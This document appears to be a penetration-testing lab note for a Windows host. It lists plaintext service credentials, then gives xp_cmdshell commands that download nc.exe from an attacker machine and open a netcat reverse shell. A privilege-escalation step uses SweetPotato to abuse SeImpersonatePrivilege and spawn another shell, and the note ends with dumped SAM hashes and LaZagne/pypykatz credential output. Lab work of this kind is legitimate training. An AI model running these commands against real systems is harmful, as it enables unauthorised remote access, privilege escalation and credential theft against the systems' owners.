### ++ Approach 10.10.112.148 ++
#### Credentials
	* web_svc:Diamond1 (mssql - normal user)
	* sql_svc:Dolphin1 (mssql - can execute commands)
	* Administrator:fd727689b0b98aebc953ac4fc3ba9756 (DC01 Admin found in post-exploitation)

#### Services
	##### 135 RDP
		- 

	##### 139,445 SMB
		-

	##### 1433 MSSQL
		We can access with web_svc credentials but as normal user
		We can access with sql_svc credentials as admin
			With xp_cmdshell we can try to send a rev shell but first we have to setup portforwarding in ligolo (this machine cannot ping our kali directly)
				listener_add --addr 0.0.0.0:8081 --to 127.0.0.1:80
			EXECUTE xp_cmdshell 'powershell wget -Outfile C:\Windows\Temp\nc.exe http://10.10.112.147:8081/nc.exe'; (with python server on 80)
			EXECUTE xp_cmdshell 'C:\Windows\Temp\nc.exe -e cmd.exe 10.10.112.147 8081'; (with nc listener on 80)

	##### 5040 unknown
		-

	##### 5985,47001 WinRM
		-

### ++ Vulnerabilities ++

#### Vuln 1: ++
	* -

### ++ System Interaction ++
#### Foothold  
	* -

#### Privilege Escalation 
	* Abuse SeImpersonatePrivilege:
		powershell wget -Outfile C:\Windows\Temp\sweet.exe http://10.10.112.147:8081/SweetPotato.exe
		C:\Windows\Temp\sweet.exe -a "C:\Windows\Temp\nc.exe -e cmd.exe 10.10.112.147 8081"

#### Attack chain
	* -
	
#### Post-exploitation 
	* Lazagne:
		Administrator:500:aad3b435b51404eeaad3b435b51404ee:507e8b20766f720619e9f33d73756b34:::
		Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
		DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
		WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:11ba4cb6993d434d8dbba9ba45fd9011:::

		------------------- Pypykatz passwords -----------------

		[+] Shahash found !!!
		Shahash: 5306053df9b19ff91a6ebd16df8ec6739f17c796
		Nthash: 79cf6d3a418ff1c9d793b3bd33bcf7f0
		Login: MS02$

		[+] Shahash found !!!
		Shahash: f41a495e6d341c7416a42abd14b9aef6f1eb6b17
		Nthash: 59b280ba707d22e3ef0aa587fc29ffe5
		Login: Administrator